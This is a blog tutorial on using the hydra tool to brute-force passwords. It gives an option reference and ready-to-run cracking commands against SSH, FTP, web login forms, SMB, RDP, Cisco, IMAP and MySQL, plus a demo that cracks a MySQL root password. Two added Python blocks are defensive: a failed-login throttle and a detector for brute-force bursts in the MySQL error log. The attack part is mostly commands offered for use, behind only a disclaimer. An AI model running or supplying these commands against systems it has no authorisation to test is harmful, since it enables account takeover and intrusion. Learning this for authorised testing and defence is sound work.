Hacker's road - using hydra for simple password brute-forcing

Tools needed:

Kali (optional)
hydra (ships with Kali; for Windows or other platforms you can install it yourself)
Password dictionary (search GitHub for the keyword "dictionary")

This tutorial is only for technical exchange. Please do not use it for other purposes. I am not responsible for any illegal and criminal behavior using this technology!!

1. Brief introduction

1.1. Source and main functions

hydra is an open-source brute-force password cracking tool from THC, a well-known hacker group. It can crack a variety of passwords online. Official website: http://www.thc.org/thc-hydra

It supports AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET, HTTP-HEAD, HTTP-PROXY, HTTPS-FORM-GET, HTTPS-FORM-POST, HTTPS-GET, HTTPS-HEAD, HTTP-Proxy, ICQ, IMAP, IRC, LDAP, MS-SQL, MYSQL, NCP, NNTP, Oracle Listener, Oracle SID, Oracle, PC-Anywhere, PCNFS, POP3, POSTGRES, RDP, Rexec, Rlogin, Rsh, SAP/R3, SIP, SMB, SMTP, SMTP Enum, SNMP, SOCKS5, SSH (v1 and v2), Subversion, Teamspeak (TS2), Telnet, VMware-Auth, VNC and XMPP passwords.

1.2. Parameter description

hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns] [-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV] server service [OPT]

-R Continue cracking from the last saved progress.
-S Use an SSL connection.
-s PORT Specify a non-default port.
-l LOGIN Specify a single user name to crack.
-L FILE Specify a user name dictionary.
-p PASS Lowercase: specify a single password to try. Rarely used; a password dictionary is normally used instead.
-P FILE Uppercase: specify a password dictionary.
-e ns Extra checks. n: try an empty password; s: try the login name as the password.
-C FILE Use a colon-separated "login:password" file instead of the -L/-P parameters.
-M FILE Specify a file listing the targets, one per line.
-o FILE Specify the output file for results.
-f After using the -M parameter, stop cracking when the first login/password pair is found.
-t TASKS The number of threads running at the same time. The default is 16.
-w TIME Set the maximum timeout, in seconds. The default is 30 s.
-v / -V Show the detailed process.
server The target IP.
service The service name. Supported services and protocols: telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt http-{head|get} http-{get|post}-form http-proxy cisco cisco-enable vnc ldap2 ldap3 mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn icq sapr3 ssh smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp, etc.
OPT Optional, service-specific options.

2. Example syntax

2.1. Crack ssh:

hydra -l <username> -P <password-dictionary> -t <threads> -vV -e ns <ip> ssh
hydra -l <username> -P <password-dictionary> -t <threads> -o save.log -vV <ip> ssh

2.2. Crack ftp:

hydra <ip> ftp -l <username> -P <password-dictionary> -t <threads> -vV
hydra <ip> ftp -l <username> -P <password-dictionary> -e ns -vV

(The number of threads defaults to 16.)

2.3. Crack a web login submitted in GET mode:

hydra -l <username> -P <password-dictionary> -t <threads> -vV -e ns <ip> http-get /admin/
hydra -l <username> -P <password-dictionary> -t <threads> -vV -e ns -f <ip> http-get /admin/index.php

2.4. Crack a web login submitted in POST mode:

hydra -l <username> -P <password-dictionary> -s 80 <ip> http-post-form "/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorry password"

(Parameter description: -t sets the number of simultaneous threads to 3, -l sets the user name to admin, the dictionary is pass.txt, the results are saved to out.txt, -f stops once a password has been cracked, 10.36.16.18 is the target IP, and http-post-form indicates that the target is a login form submitted via HTTP POST.

The content in is the return information prompt indicating the wrong guess.)
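
One server-side control for the login form targeted in 2.4, as an added example that is not part of the original post: a sliding-window limit on failed logins per user name and per source address, so that a long dictionary run gets only a handful of real password checks. The class and function names, the limits and the replay helper are assumptions made for this illustration.

```python
import time
from collections import deque


class LoginThrottle:
    """Sliding-window failure limits per user name and per source IP."""

    def __init__(self, max_per_user=5, max_per_ip=20, window=300.0,
                 clock=time.monotonic):
        self.limits = {"user": max_per_user, "ip": max_per_ip}
        self.window, self.clock = window, clock
        self._fails = {}  # (kind, value) -> deque of failure timestamps

    def _recent(self, key):
        q = self._fails.get(key)
        if q is None:
            return 0
        cutoff = self.clock() - self.window
        while q and q[0] <= cutoff:
            q.popleft()          # drop failures older than the window
        if not q:
            del self._fails[key]
        return len(q)

    def allowed(self, user, ip):
        """Call before verifying the password; False means reject unchecked."""
        return all(self._recent((kind, value)) < self.limits[kind]
                   for kind, value in (("user", user), ("ip", ip)))

    def record_failure(self, user, ip):
        now = self.clock()
        for key in (("user", user), ("ip", ip)):
            self._fails.setdefault(key, deque()).append(now)

    def record_success(self, user):
        # Per-user reset only; a valid login must not clear a source's history.
        self._fails.pop(("user", user), None)


def checked_guesses(throttle, guesses, ip, real):
    """Replay (user, password) guesses; return how many reached verification."""
    checked = 0
    for user, password in guesses:
        if not throttle.allowed(user, ip):
            continue             # answered with the generic failure page
        checked += 1
        if real.get(user) == password:
            throttle.record_success(user)
        else:
            throttle.record_failure(user, ip)
    return checked
```

The per-user limit answers the -l/-P pattern (one account, many passwords) and the per-IP limit answers the -L/-p pattern (many accounts, one password); a per-user limit can also lock out the legitimate owner, so keep the window short.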

2.5. Crack https:

hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https 

2.6. Crack teamspeak:

hydra -l <username> -P <password-dictionary> -s <port> -vV <ip> teamspeak

2.7. Crack cisco:

hydra -P pass.txt 10.36.16.18 cisco 
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable 

2.8. Crack smb:

hydra -l administrator -P pass.txt 10.36.16.18 smb 

2.9. Crack pop3:

hydra -l muts -P pass.txt my.pop3.mail pop3 

2.10. Cracking rdp:

hydra <ip> rdp -l administrator -P pass.txt -V

2.11. Crack HTTP proxy:

hydra -l admin -P pass.txt http-proxy://10.36.16.18 

2.12. Crack imap:

hydra -L user.txt -p secret 10.36.16.18 imap PLAIN 
hydra -C defaults.txt -6 imap://[fe80::2c:31ff:fe12:ac11]:143/PLAIN

3. Practical demonstration

Environment setup: see the reference "MySQL 5.7: enable password login".

3.1. MySQL with a specified user name

3.1.1. Brute-forcing with a specified user name

Password dictionary: write multiple passwords (one per line), one of which must be the real password, otherwise the brute-force attempt fails.

Brute-force command:

hydra -l root -P pass.txt mysql://172.17.0.2

PS:
-l # specifies a single user name (-L specifies a user name dictionary)
-P # specifies a password dictionary file

Then you can see that the password was cracked successfully!

Addendum: to see how long the run took, prefix the command with time:

time hydra -l root -P pass.txt mysql://172.17.0.2
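
What the run above looks like from the database side, as an added example that is not part of the original post: the script scans MySQL 5.7 error-log lines for bursts of "Access denied" from one source and reports whether one account or several were targeted. It assumes log_error_verbosity=3 so that denied logins are written to the error log; the function name, thresholds, source addresses and sample lines are constructed for the illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# MySQL 5.7 error-log entry: "<UTC timestamp> <thread id> [Note] Access denied ..."
DENIED = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d)\.\d+Z \d+ \[Note\] "
    r"Access denied for user '(?P<user>[^']*)'@'(?P<host>[^']*)'")


def find_bruteforce(lines, threshold=10, window=timedelta(seconds=60)):
    """Return {source: details} for sources whose densest burst of denied
    logins inside `window` reaches `threshold`."""
    events = defaultdict(list)
    for line in lines:
        m = DENIED.match(line)
        if m:
            ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%S")
            events[m["host"]].append((ts, m["user"]))
    alerts = {}
    for host, evs in events.items():
        evs.sort()
        best, start = (0, 0), 0
        for end in range(len(evs)):
            while evs[end][0] - evs[start][0] > window:
                start += 1       # shrink the window from the left
            if end + 1 - start > best[1] - best[0]:
                best = (start, end + 1)
        burst = evs[best[0]:best[1]]
        if len(burst) >= threshold:
            users = {u for _, u in burst}
            pattern = "single-account" if len(users) == 1 else "multi-account"
            alerts[host] = {"failures": len(burst), "users": users,
                            "pattern": pattern}
    return alerts


# Constructed sample: two isolated typos plus 16 denials in two seconds,
# the shape left by the default 16 parallel tasks against one account.
SAMPLE = [
    "2022-05-12T16:40:00.000000Z 3 [Note] Access denied for user 'app'@'10.0.0.5' (using password: YES)",
] + [
    f"2022-05-12T16:44:{i // 8:02d}.{i % 8}00000Z {10 + i} [Note] "
    f"Access denied for user 'root'@'172.17.0.1' (using password: YES)"
    for i in range(16)
] + [
    "2022-05-12T16:50:00.000000Z 40 [Note] Access denied for user 'app'@'10.0.0.5' (using password: YES)",
]

if __name__ == "__main__":
    print(find_bruteforce(SAMPLE))
```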

Posted by donbonzo on Thu, 12 May 2022 19:44:06 +0300